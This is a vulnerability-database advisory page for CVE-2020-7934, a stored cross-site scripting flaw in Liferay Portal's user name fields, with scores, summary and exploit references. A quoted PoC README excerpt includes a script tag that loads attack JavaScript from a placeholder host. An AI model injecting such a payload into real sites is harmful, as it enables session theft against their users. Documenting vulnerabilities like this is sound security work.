Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
5.4
CVSSv3

CVE-2020-7934

Published: 28/01/2020 Updated: 23/11/2020
CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8
CVSS v3 Base Score: 5.4 | Impact Score: 2.7 | Exploitability Score: 2.3
VMScore: 312
Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N
Subscribe to Liferay

Vulnerability Summary

In LifeRay Portal CE 7.1.0 up to and including 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

liferay liferay portal

Exploits

Exploit DB: LifeRay 7.2.1 GA2 Cross Site Scripting
LifeRay version 721 GA2 suffers from a persistent cross site scripting vulnerability ...

Github Repositories

https://github.com/Sergio235705/audit-xss-cve-2020-7934

CVE 2020-7934 How to run CVE Requirements docker Remarks it's possible put the script attack online (given the js code ) yourjavascriptcom/ Our Js script online for the attack html <script src="yourjavascriptcom/920172199111/attackjs"></script> Commands for configuration go to root folder of this project run "

References

CWE-79https://semanticbits.com/liferay-portal-authenticated-xss-disclosure/https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934http://packetstormsecurity.com/files/160168/LifeRay-7.2.1-GA2-Cross-Site-Scripting.htmlhttps://nvd.nist.govhttps://github.com/Sergio235705/audit-xss-cve-2020-7934https://packetstormsecurity.com/files/160168/LifeRay-7.2.1-GA2-Cross-Site-Scripting.html
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2020-4463CVE-2024-29895injectCVE-2023-52689CVE-2024-5049CVE-2024-5051privilege escalationphysicalCVE-2023-52676
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook